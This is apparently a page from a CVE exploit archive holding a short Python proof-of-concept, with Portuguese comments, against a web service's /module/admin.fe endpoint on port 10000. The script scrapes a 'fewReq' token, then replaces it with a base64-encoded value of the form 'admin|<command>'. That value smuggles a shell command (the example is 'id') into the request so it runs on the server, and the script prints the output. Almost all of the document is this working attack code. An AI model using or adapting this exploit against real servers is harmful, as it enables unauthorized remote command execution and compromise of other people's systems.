4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import requests
import re
import base64

# Configurações do alvo
TARGET = "http://192.168.199.120:10000"
USERNAME = "user"
PASSWORD = "password"

# Inicia uma sessão
session = requests.Session()

# *Passo 1: Mapeando Token (fewReq)*
token_url = f"{TARGET}/module/admin.fe"
response = session.get(token_url)

# Extraindo o token com regex
match = re.search(r"fewReq=:[A-Za-z0-9+=]+", response.text)
if not match:
    print("[!] Token fewReq não encontrado.")
    exit()

fewReq_original = match.group(0).split("=")[1]
print(f"[+] Token original capturado: {fewReq_original}")

# *Passo 2: Criando um novo payload com comando injetado*
cmd = "id"  # Comando para testar a execução
payload = f"admin|{cmd}".encode()
fewReq_encoded = base64.b64encode(payload).decode()

# *Passo 3: Substituir fewReq na requisição privilegiada*
exploit_url = f"{TARGET}/module/admin.fe?fewReq=:B:{fewReq_encoded}"
exploit_response = session.get(exploit_url)

print("[+] Exploit executado!")
print("Resposta do servidor:")
print(exploit_response.text)